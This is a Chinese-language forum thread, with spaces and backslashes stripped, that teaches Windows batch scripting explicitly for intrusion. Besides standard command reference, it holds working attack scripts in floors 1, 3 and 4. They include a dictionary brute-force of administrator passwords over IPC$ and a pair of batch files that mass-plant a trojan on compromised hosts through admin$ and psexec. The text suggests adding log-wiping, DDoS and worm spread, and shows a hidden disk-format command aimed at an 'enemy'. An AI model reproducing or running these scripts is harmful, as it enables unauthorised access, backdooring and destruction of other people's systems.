| 批處理文件是無格式的文本文件,它包含一條或多條命令。它的文件擴展名爲.bat或.cmd。在命令提示下鍵入批處理文件的名稱,或者雙擊該批處理文件,系統就會調用Cmd.exe按照該文件中各個命令出現的順序來逐個運行它們。使用批處理文件(也被稱爲批處理程序或腳本),可以簡化日常或重複性任務。當然我們的這個版本的主要內容是介紹批處理在入侵中一些實際運用,例如我們後面要提到的用批處理文件來給系統打補丁、批量植入後門程序等。下面就開始我們批處理學習之旅吧。 一.簡單批處理內部命令簡介 1.Echo命令 打開回顯或關閉請求回顯功能,或顯示消息。如果沒有任何參數,echo命令將顯示當前回顯設置。 語法 echo[{on|off}][message] Sample:@echooff/echohelloworld 在實際應用中我們會把這條命令和重定向符號(也稱爲管道符號,一般用>>>^)結合來實現輸入一些命令到特定格式的文件中.這將在以後的例子中體現出來。 2.@命令 表示不顯示@後面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對方看到你使用的命令啦。 Sample:@echooff @echoNowinitializingtheprogram,pleasewaitaminite... @formatX:/q/u/autoset(format這個命令是不可以使用/y這個參數的,可喜的是微軟留了個autoset這個參數給我們,效果和/y是一樣的。) 3.Goto命令 指定跳轉到標籤,找到標籤後,程序將處理從下一行開始的命令。 語法:gotolabel(label是參數,指定所要轉向的批處理程序中的行。) Sample: if{%1}=={}gotonoparms if{%2}=={}gotonoparms(如果這裏的if、%1、%2你不明白的話,先跳過去,後面會有詳細的解釋。) @Remcheckparametersifnullshowusage :noparms echoUsage:monitor.batServerIPPortNumber gotoend 標籤的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標籤,goto命令就是根據這個:來尋找下一步跳到到那裏。最好有一些說明這樣你別人看起來纔會理解你的意圖啊。 4.Rem命令 註釋命令,在C語言中相當與/*--------*/,它並不會被執行,只是起一個註釋的作用,便於別人閱讀和你自己日後修改。 RemMessage Sample:@RemHereisthedescription. 5.Pause命令 運行Pause命令時,將顯示下面的消息: Pressanykeytocontinue... Sample: @echooff egin copya .*d:back echoPleaseputanewdiskintodriverA pause gotobegin 在這個例子中,驅動器A中磁盤上的所有文件均複製到d ack中。顯示的註釋提示您將另一張磁盤放入驅動器A時,pause命令會使程序掛起,以便您更換磁盤,然後按任意鍵繼續處理。 6.Call命令 從一個批處理程序調用另一個批處理程序,並且不終止父批處理程序。call命令接受用作調用目標的標籤。如果在腳本或批處理文件外使用Call,它將不會在命令行起作用。 語法 call[Drive:][Path]FileName[BatchParameters][:label[arguments] 參數 [Drive:}[Path]FileName 指定要調用的批處理程序的位置和名稱。filename參數必須具有.bat或.cmd擴展名。 7.start命令 調用外部程序,所有的DOS命令和命令行程序都可以由start命令來調用。 入侵常用參數: MIN開始時窗口最小化 SEPARATE在分開的空間內開始16位Windows程序 HIGH在HIGH優先級類別開始應用程序 REALTIME在REALTIME優先級類別開始應用程序 WAIT啓動應用程序並等候它結束 parameters這些爲傳送到命令/程序的參數 執行的應用程序是32-位GUI應用程序時,CMD.EXE不等應用程序終止就返回命令提示。如果在命令腳本內執行,該新行爲則不會發生。 8.choice命令 choice使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:後應寫提示可輸入的字符,之間無空格。它的返回碼爲1234…… |
|
|
|
| 60.195.204.* |
2樓 如:choice/c:dmedefrag,mem,end將顯示 defrag,mem,end[D,M,E]? Sample: Sample.bat的內容如下: @echooff choice/c:dmedefrag,mem,end iferrorlevel3gotodefrag(應先判斷數值最高的錯誤碼) iferrorlevel2gotomem iferrotlevel1gotoend :defrag c:dosdefrag gotoend :mem mem gotoend :end echogoodbye 此文件運行後,將顯示defrag,mem,end[D,M,E]?用戶可選擇dme,然後if語句將作出判斷,d表示執行標號爲defrag的程序段,m表示執行標號爲mem的程序段,e表示執行標號爲end的程序段,每個程序段最後都以gotoend將程序跳到end標號處,然後程序將顯示goodbye,文件結束。 9.If命令 if表示將判斷是否符合規定的條件,從而決定執行不同的命令。有三種格式: 1、if"參數"=="字符串" 待執行的命令 參數如果等於指定的字符串,則條件成立,運行命令,否則運行下一句。(注意是兩個等號) 如if"%1"=="a"formata: if{%1}=={}gotonoparms if{%2}=={}gotonoparms 2、ifexist文件名 待執行的命令 如果有指定的文件,則條件成立,運行命令,否則運行下一句。 如ifexistconfig.syseditconfig.sys 3、iferrorlevel/ifnoterrorlevel數字 待執行的命令 如果返回碼等於指定的數字,則條件成立,運行命令,否則運行下一句。 如iferrorlevel2gotox2 DOS程序運行時都會返回一個數字給DOS,稱爲錯誤碼errorlevel或稱返回碼,常見的返回碼爲0、1。 10.for命令 for命令是一個比較複雜的命令,主要用於參數在指定的範圍內循環執行命令。 在批處理文件中使用FOR命令時,指定變量請使用%%variable for{%variable|%%variable}in(set)docommand[CommandLineOptions] %variable指定一個單一字母可替換的參數。 (set)指定一個或一組文件。可以使用通配符。 command指定對每個文件執行的命令。 command-parameters爲特定命令指定參數或命令行開關。 在批處理文件中使用FOR命令時,指定變量請使用%%variable 而不要用%variable。變量名稱是區分大小寫的,所以%i不同於%I 如果命令擴展名被啓用,下列額外的FOR命令格式會受到 支持: FOR/D%variableIN(set)DOcommand[command-parameters] 如果集中包含通配符,則指定與目錄名匹配,而不與文件 名匹配。 FOR/R[drive:]path]%variableIN(set)DOcommand[command- 檢查以[drive:]path爲根的目錄樹,指向每個目錄中的 FOR語句。如果在/R後沒有指定目錄,則使用當前 目錄。如果集僅爲一個單點(.)字符,則枚舉該目錄樹。 FOR/L%variableIN(start,step,end)DOcommand[command-para 該集表示以增量形式從開始到結束的一個數字序列。 因此,(1,1,5)將產生序列12345,(5,-1,1)將產生 序列(54321)。 FOR/F["options"]%variableIN(file-set)DOcommand FOR/F["options"]%variableIN("string"t DOcommand FOR/F["options"]%variableIN('command')DOcommand 或者,如果有usebackq選項: FOR/F["options"]%variableIN(file-set)DOcommand FOR/F["options"]%variableIN("string"t DOcommand FOR/F["options"]%variableIN('command')DOcommand filenameset爲一個或多個文件名。繼續到filenameset中的 下一個文件之前,每份文件都已被打開、讀取並經過處理。 處理包括讀取文件,將其分成一行行的文字,然後將每行 解析成零或更多的符號。然後用已找到的符號字符串變量值 調用For循環。以默認方式,/F通過每個文件的每一行中分開 的第一個空白符號。跳過空白行。您可通過指定可選"options" 參數替代默認解析操作。這個帶引號的字符串包括一個或多個 指定不同解析選項的關鍵字。這些關鍵字爲: eol=c-指一個行註釋字符的結尾(就一個) |
|
|
| 60.195.204.* |
3樓 skip=n-指在文件開始時忽略的行數。delims=xxx-指分隔符集。這個替換了空格和跳格鍵的 默認分隔符集。 tokens=x,y,m-n-指每行的哪一個符號被傳遞到每個迭代 的for本身。這會導致額外變量名稱的 格式爲一個範圍。通過nth符號指定m 符號字符串中的最後一個字符星號, 那麼額外的變量將在最後一個符號解析之 分配並接受行的保留文本。 usebackq-指定新語法已在下類情況中使用: 在作爲命令執行一個後引號的字符串並且 引號字符爲文字字符串命令並允許在fi 中使用雙引號擴起文件名稱。 sample1: FOR/F"eol=;tokens=2,3*delims=,"%iin(myfile.txt)docommand 會分析myfile.txt中的每一行,忽略以分號打頭的那些行,將 每行中的第二個和第三個符號傳遞給for程序體;用逗號和/或 空格定界符號。請注意,這個for程序體的語句引用%i來 取得第二個符號,引用%j來取得第三個符號,引用%k 來取得第三個符號後的所有剩餘符號。對於帶有空格的文件 名,您需要用雙引號將文件名括起來。爲了用這種方式來使 用雙引號,您還需要使用usebackq選項,否則,雙引號會 被理解成是用作定義某個要分析的字符串的。 %i專門在for語句中得到說明,%j和%k是通過 tokens=選項專門得到說明的。您可以通過tokens=一行 指定最多26個符號,只要不試圖說明一個高於字母'z'或 'Z'的變量。請記住,FOR變量是單一字母、分大小寫和全局的; 同時不能有52個以上都在使用中。 您還可以在相鄰字符串上使用FOR/F分析邏輯;方法是, 用單引號將括號之間的filenameset括起來。這樣,該字符 串會被當作一個文件中的一個單一輸入行。 最後,您可以用FOR/F命令來分析命令的輸出。方法是,將 括號之間的filenameset變成一個反括字符串。該字符串會 被當作命令行,傳遞到一個子CMD.EXE,其輸出會被抓進 內存,並被當作文件分析。因此,以下例子: FOR/F"usebackqdelims=="%iIN(`set`)DO@echo%i 會枚舉當前環境中的環境變量名稱。 另外,FOR變量參照的替換已被增強。您現在可以使用下列 選項語法: ~I-刪除任何引號("t ,擴充%I %~fI-將%I擴充到一個完全合格的路徑名 %~dI-僅將%I擴充到一個驅動器號 %~pI-僅將%I擴充到一個路徑 %~nI-僅將%I擴充到一個文件名 %~xI-僅將%I擴充到一個文件擴展名 %~sI-擴充的路徑只含有短名 %~aI-將%I擴充到文件的文件屬性 %~tI-將%I擴充到文件的日期/時間 %~zI-將%I擴充到文件的大小 %~$PATH:I-查找列在路徑環境變量的目錄,並將%I擴充 到找到的第一個完全合格的名稱。如果環境變量 未被定義,或者沒有找到文件,此組合鍵會擴充 空字符串 可以組合修飾符來得到多重結果: %~dpI-僅將%I擴充到一個驅動器號和路徑 %~nxI-僅將%I擴充到一個文件名和擴展名 %~fsI-僅將%I擴充到一個帶有短名的完整路徑名 %~dp$PATH:i-查找列在路徑環境變量的目錄,並將%I擴充 到找到的第一個驅動器號和路徑。 %~ftzaI-將%I擴充到類似輸出線路的DIR 在以上例子中,%I和PATH可用其他有效數值代替。%~語法 用一個有效的FOR變量名終止。選取類似%I的大寫變量名 比較易讀,而且避免與不分大小寫的組合鍵混淆。 二、引用舉例 以上是MS的官方幫助,下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。 sample2: 引用: 利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。 我們用netuse/ipipc$"password"/u:"administrator"來嘗試這和目標主機進行連接,當成功時記下密碼。 最主要的命令是一條:for/fi%in(dict.txt)donetuse/ipipc$"i%"/u:"administrator" 用i%來表示admin的密碼,在dict.txt中這個取i%的值用netuse命令來連接。然後將程序運行結果傳遞給find命令-- for/fi%%in(dict.txt)donetuse/ipipc$"i%%"/u:"administrator"|find":命令成功完成">>D k.txt,這樣就ko了。 |
|
|
| 60.195.204.* |
4樓 sample3: 你有沒有過手裏有大量肉雞等着你去種後門+木馬呢?,當數量特別多的時候,原本很開心的一件事都會變得很鬱悶:)。文章開頭就談到使用批處理文件,可以簡化日常或重複性任務。那麼如何實現呢?呵呵,看下去你就會明白了。 主要命令也只有一條:(在批處理文件中使用FOR命令時,指定變量使用%%variable) @for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcalldoor.bat%%i%%j%%k tokens的用法請參見上面的sample1,在這裏它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i%j%k。 而cultivate.bat無非就是用netuse命令來建立IPC$連接,並copy木馬+後門到victim,然後用返回碼(Iferrorlever=)來篩選成功種植後門的主機,並echo出來,或者echo到指定的文件。 delims=表示vivtim.txt中的內容是一空格來分隔的。我想看到這裏你也一定明白這victim.txt裏的內容是什麼樣的了。應該根據%%i%%j%%k表示的對象來排列,一般就是ippasswordusername。 代碼雛形: ---------------cutherethensaveasabatchfile(Icallitmain.batp --------------------------- @echooff @if"%1"==""gotousage @for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcallIPChack.bat%%i%%j%%k @gotoend :usage @echorunthisbatchindosmodle.orjustdouble-clickit. :end ---------------cutherethensaveasabatchfile(Icallitmain.batp --------------------------- -------------------cutherethensaveasabatchfile(Icallitdoor.bat)----------------------------- @netuse/%1ipc$%3/u:"%2" @iferrorlevel1gotofailed @echoTryingtoestablishtheIPC$connection…………OK @copywindrv32.exe/%1admin$system32&&ifnoterrorlevel1echoIP%1USER%2PWD%3>>ko.txt @psexec/%1c:winntsystem32windrv32.exe @psexec/%1netstartwindrv32&&ifnoterrorlevel1echo%1Backdoored>>ko.txt :failed @echoSorrycannotconnectedtothevictim. -----------------cutherethensaveasabatchfile(Icallitdoor.bat)-------------------------------- 這只是一個自動種植後門批處理的雛形,兩個批處理和後門程序(Windrv32.exe),PSexec.exe需放在統一目錄下.批處理內容 尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究. 三、如何在批處理文件中使用參數 批處理中可以使用參數,一般從1%到9%這九個,當有多個參數時需要用shift來移動,這種情況並不多見,我們就不考慮它了。 sample1:fomat.bat @echooff if"%1"=="a"formata: :format @formata:/q/u/auotset @echopleaseinsertanotherdisktodriverA. @pause @gotofomat 這個例子用於連續地格式化幾張軟盤,所以用的時候需在dos窗口輸入fomat.bata,呵呵,好像有點畫蛇添足了~^_^ sample2: 當我們要建立一個IPC$連接地時候總要輸入一大串命令,弄不好就打錯了,所以我們不如把一些固定命令寫入一個批處理,把肉雞地ippasswordusername當着參數來賦給這個批處理,這樣就不用每次都打命令了。 @echooff @netuse/1%ipc$"2%"/u:"3%"注意哦,這裏PASSWORD是第二個參數。 @iferrorlevel1echoconnectionfailed 怎麼樣,使用參數還是比較簡單的吧?你這麼帥一定學會了^_^. 四、如何使用組合命令(CompoundCommand) 1.& Usage:第一條命令&第二條命令[&第三條命令...] 用這種方法可以同時執行多條命令,而不管命令是否執行成功 Sample: C:>dirz:&dirc:Ex4rch Thesystemcannotfindthepathspecified. VolumeindriveChasnolabel. VolumeSerialNumberis0078-59FB |
|
|
| 60.195.204.* |
5樓 Directoryofc:Ex4rch 2002-05-1423:51 . 2002-05-1423:51 .. 2002-05-1423:5114sometips.gif 2.&& Usage:第一條命令&&第二條命令[&&第三條命令...] 用這種方法可以同時執行多條命令,當碰到執行出錯的命令後將不執行後面的命令,如果一直沒有出錯則一直執行完所有命令; Sample: C:>dirz:&&dirc:Ex4rch Thesystemcannotfindthepathspecified. C:>dirc:Ex4rch&&dirz: VolumeindriveChasnolabel. VolumeSerialNumberis0078-59FB Directoryofc:Ex4rch 2002-05-1423:55 . 2002-05-1423:55 .. 2002-05-1423:5514sometips.gif 1File(s)14bytes 2Dir(s)768,671,744bytesfree Thesystemcannotfindthepathspecified. 在做備份的時候可能會用到這種命令會比較簡單,如: dirfile://192.168.0.1/database/backup.mdb&©file://192.168.0.1/database/backup.mdbE ackup 如果遠程服務器上存在backup.mdb文件,就執行copy命令,若不存在該文件則不執行copy命令。這種用法可以替換IFexist了:) 3.|| Usage:第一條命令||第二條命令[||第三條命令...] 用這種方法可以同時執行多條命令,當碰到執行正確的命令後將不執行後面的命令,如果沒有出現正確的命令則一直執行完所有命令; Sample: C:Ex4rch>dirsometips.gif||delsometips.gif VolumeindriveChasnolabel. VolumeSerialNumberis0078-59FB DirectoryofC:Ex4rch 2002-05-1423:5514sometips.gif 1File(s)14bytes 0Dir(s)768,696,320bytesfree 組合命令使用的例子: sample: @copytrojan.exe/%1admin$system32&&ifnoterrorlevel1echoIP%1USER%2PASS%3>>victim.txt 五、管道命令的使用 1.|命令 Usage:第一條命令|第二條命令[|第三條命令...] 將第一條命令的結果作爲第二條命令的參數來使用,記得在unix中這種方式很常見。 sample: time/t>>D:IP.log netstat-n-ptcp|find":3389">>D:IP.log startExplorer 看出來了麼?用於終端服務允許我們爲用戶自定義起始的程序,來實現讓用戶運行下面這個bat,以獲得登錄用戶的IP。 2.>、>>輸出重定向命令 將一條命令或某個程序輸出結果的重定向到特定文件中,>與>>的區別在於,>會清除調原有文件中的內容後寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。 sample1: echohelloworld>c:hello.txt(stupidexample?) sample2: 時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那裏鑽,DLL馬也不例外,針對這一點我們可以在安裝好系統和必要的應用程序後,對該目錄下的EXE和DLL文件作一個記錄: 運行CMD--轉換目錄到system32--dir*.exe>exeback.txt&dir*.dll>dllback.txt, 這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中, 日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了. 這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然後運行: CMD--fcexeback.txtexeback1.txt>diff.txt&fcdllback.txtdllback1.txt>diff.txt.(用FC命令比較前後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE文件,然後通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒有是最好,如果有的話也不要直接DEL掉,先用regsvr32/utrojan.dll將後門DLL文件註銷掉,再把它移到回收站裏,若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。 3.<、>&、<& <從文件中而不是從鍵盤中讀入命令輸入。 >&將一個句柄的輸出寫入到另一個句柄的輸入中。 |
|
|